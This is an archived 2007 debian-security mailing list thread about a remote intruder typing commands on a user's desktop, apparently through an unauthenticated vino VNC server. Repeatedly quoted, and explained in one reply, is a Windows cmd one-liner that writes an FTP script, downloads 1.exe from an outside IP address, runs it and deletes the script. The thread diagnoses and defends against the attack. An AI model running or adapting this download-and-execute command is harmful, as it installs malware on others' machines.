spooky windows script

classic Classic list List threaded Threaded
15 messages Options
Reply | Threaded
Open this post in threaded view
|

spooky windows script

Jan Outhuis
Hello,

Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:

%systemroot%\system32\cmd.exe
cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

(I see on my network monitor that this is coming from outside; IP-number and user name vary.)

After that all is back to normal.

Now this is of course a nuisance, but is it also a thread? And what can be done against it?

Anybody got a clue on this?

Tia,

Jan Outhuis



--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Henri Salo-2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while
> surfing the net. My cursor is taken over and the following code is
> typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >>
> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik
> &1.exe &exit
>
> (I see on my network monitor that this is coming from outside;
> IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a thread? And what
> can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis
>

Do you have any kind of VNC-servers running? What is you ip-address?
Can i scan your open ports from it?

- ---
Henri Salo <fgeek at fgeek.fi> +358407705733
GPG ID: 2EA46E4F  fp: 14D0 7803 BFF6 EFA0 9998  8C4B 5DFE A106 2EA4 6E4F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGQHm1Xf6hBi6kbk8RAvTbAJ0es46vFTz+/6upbt8K3lYYV8HhfwCgs5CC
LK0OvGWT07LV7sZuH+RItUE=
=J58p
-----END PGP SIGNATURE-----
Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Dale Amon
In reply to this post by Jan Outhuis
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?.
I haven't done DOS in a long time so I am a bit shaky
in fully interpreting.

Check for something named 1.exe in your directory.


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

celejar
In reply to this post by Jan Outhuis
On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a thread? And what can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

andersen-4

If this occurred on my Windows box, I would back up what needs to be backed up
and reload the OS with something useful.  Your machine has clearly been
compromised.



--

On Tue, 8 May 2007, Celejar wrote:

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a thread? And what can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator




--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Stephan Loh
In reply to this post by celejar
hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does:

it writes the following text lines in a file called "ik":

open 59.31.153.120 22783
user db database
get 1.exe
bye

this are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppresses user autologin and verboseness
and the parameter -s:ik executes the content of the file "ik" as FTP
commands. the file ftp://db:database@59.31.153.120:22783/1.exe is being
fetched, the file "ik" is then being deleted and finally the file
"1.exe" is being executed. i suppose that 1.exe is some kind of windows
trojan or virus.

cheers,
-stephan loh
 

On 2007.05.08 15:39, Celejar wrote:

> On Tue,  8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <[hidden email]> wrote:
>
> > Hello,
> >
> > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> >
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> >
> > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> >
> > After that all is back to normal.
> >
> > Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> >
> > Anybody got a clue on this?
> >
> > Tia,
> >
> > Jan Outhuis
>
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
>
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
>
>
> --
> To UNSUBSCRIBE, email to [hidden email]
> with a subject of "unsubscribe". Trouble? Contact [hidden email]
>


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

David Clymer
In reply to this post by Jan Outhuis
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a thread? And what can be done against it?
>
> Anybody got a clue on this?
>

I'm sure someone has a clue. However, clued listmembers or not, a
windows security issue is not an appropriate topic for discussion on a
mailing list called "debian-security". As the name implies, this list is
for discussing security issues as they relate to the Debian GNU/Linux
distribution.

-davidc

--
A good hot dog feeds the hand that bites it.


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Jan Outhuis
In reply to this post by Jan Outhuis



> Well,
>
> to specify on this, I am running Debian testing, and surfing with Firefox 2.0.
>
> The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter.
>
> I've checked my filesystem and no 1.exe file seems to be present.
>
> My IP-address is assigned dynamically by my ISP; it differs every time I log in. But I do have vino-server running. I'm going to check on that.
>
> thanks
>
> > Datum: 08/05/07 04:15 PM
> > Van: "David Clymer" <[hidden email]>
> > Aan: [hidden email]
> > CC:
> > Onderwerp : Re: spooky windows script
> >
> > On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
> > > Hello,
> > >
> > > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> > >
> > > %systemroot%\system32\cmd.exe
> > > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> > >
> > > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> > >
> > > After that all is back to normal.
> > >
> > > Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> > >
> > > Anybody got a clue on this?
> > >
> >
> > I'm sure someone has a clue. However, clued listmembers or not, a
> > windows security issue is not an appropriate topic for discussion on a
> > mailing list called "debian-security". As the name implies, this list is
> > for discussing security issues as they relate to the Debian GNU/Linux
> > distribution.
> >
> > -davidc
> >
> > --
> > A good hot dog feeds the hand that bites it.
> >
> >
> > --
> > To UNSUBSCRIBE, email to [hidden email]
> > with a subject of "unsubscribe". Trouble? Contact [hidden email]
> >
> >
> >


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Chris Adams-3

On May 8, 2007, at 9:17 AM, Jan Outhuis wrote:
> The script gets typed in any window that's active at the moment the  
> cursor is being taken over: it may be the Firefox 'find'-field or a  
> terminal window for that matter.

Do you have a VNC server installed? If so you really want to either  
remove it or configure it to only listen on localhost so you can  
access it over an SSH tunnel but remote attackers can't get in. I'd  
also strongly recommend that you configure the built-in firewall  
since it you may have other exposed services - unfortunately I don't  
have a package recommendation as I just configure iptables directly.

I've seen this happen a couple of times on Macs where people  
inadvertently left VNC open w/o a password with very similar  
behaviour, which suggests people are scanning for vulnerable VNC  
installs but the automated stuff currently only has Windows exploits.

Chris


smime.p7s (3K) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

celejar
In reply to this post by Jan Outhuis
On Tue,  8 May 2007 18:17:08 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

>
>
>
> > Well,
> >
> > to specify on this, I am running Debian testing, and surfing with Firefox 2.0.
> >
> > The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter.
> >
> > I've checked my filesystem and no 1.exe file seems to be present.
> >
> > My IP-address is assigned dynamically by my ISP; it differs every time I log in. But I do have vino-server running. I'm going to check on that.
> >
> > thanks

Just for the record, I apparently interpreted the ftp business backward
in my earlier post; pulling in, not sending out.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Thomas Hochstein
In reply to this post by Jan Outhuis
Chris Adams schrieb:

> Do you have a VNC server installed?

| But I do have vino-server running.

Yes.


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Gerardo Curiel-2
El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió:
> Chris Adams schrieb:
>
> > Do you have a VNC server installed?
>
> | But I do have vino-server running.
>
> Yes.

That's the problem, the same happened to me a couple of weeks ago, in my
Desktop(a newly installed Debian Unstable).

Vino seems to open the vnc port to the outside without password when
installed by default.


>
>

--
Gerardo Curiel  <[hidden email]>  <[hidden email]>
Geek By NaTure,LiNuX By ChOiCe,DebiAn of CoUrsE
gpg fingerprint: 228B 0F96 8653 DF52 9740  B75E FB32 9C30 E179 7BD2
http://www.debian.org

signature.asc (196 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Noah Meyerhans-3
On Tue, May 08, 2007 at 05:34:30PM -0400, Gerardo Curiel wrote:

> El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribi?:
> > Chris Adams schrieb:
> >
> > > Do you have a VNC server installed?
> >
> > | But I do have vino-server running.
>
> That's the problem, the same happened to me a couple of weeks ago, in my
> Desktop(a newly installed Debian Unstable).
>
> Vino seems to open the vnc port to the outside without password when
> installed by default.
No, vino doesn't do anything by default (just confirmed in sid).  What
do you have configured in System -> Preferences -> Remote Desktop ?  By
default, nobody can connect at all.  Clicking on the only initially
active checkbox ("Allow other users to view your desktop") results in a
configuration where other users can connect, but they can't actually
view or control your desktop until you've approved their connection via
a popup dialog.  If you uncheck "Ask you for confirmation" and neglect
to check "Require the user to enter this password" and provide a
password, then it seems that unauthenticated, unapproved connections are
allowed.  IMO this should never ever be allowed, but it is.  It's
definitely not the default state, though.

noah


signature.asc (196 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Lee Braiden-4
In reply to this post by Gerardo Curiel-2
On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:

> El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió:
> > Chris Adams schrieb:
> > > Do you have a VNC server installed?
> > >
> > | But I do have vino-server running.
> >
> > Yes.
>
> That's the problem, the same happened to me a couple of weeks ago, in my
> Desktop(a newly installed Debian Unstable).
>
> Vino seems to open the vnc port to the outside without password when
> installed by default.

I would say the problem is more that his system is configured to allow any
servers without explicit authorisation.  That could just as easily have been
a trojan or rootkit opening a port.  Best to setup your firewall to block all
incoming connections by default, and explicitly allow only what your system
is actually serving, and only to machines it needs to serve.

--
Lee

Reply | Threaded
Open this post in threaded view
|

Re: spooky windows script

Jan Outhuis
In reply to this post by Jan Outhuis

That's just what I've done: closed the vnc-holes in my firewall (btw it does use a blacklist on incoming connections), and configured the vino-server to not be running by default and when it runs to not accept any unauthorised connections.

Let's see if that does the trick.

Greetings,

Jan

> Datum: 09/05/07 08:11 AM
> Van: "Lee Braiden" <[hidden email]>
> Aan: [hidden email]
> CC:
> Onderwerp : Re: spooky windows script
>
> On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:
> > El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió:
> > > Chris Adams schrieb:
> > > > Do you have a VNC server installed?
> > > >
> > > | But I do have vino-server running.
> > >
> > > Yes.
> >
> > That's the problem, the same happened to me a couple of weeks ago, in my
> > Desktop(a newly installed Debian Unstable).
> >
> > Vino seems to open the vnc port to the outside without password when
> > installed by default.
>
> I would say the problem is more that his system is configured to allow any
> servers without explicit authorisation.  That could just as easily have been
> a trojan or rootkit opening a port.  Best to setup your firewall to block all
> incoming connections by default, and explicitly allow only what your system
> is actually serving, and only to machines it needs to serve.
>
> --
> Lee
>
>
>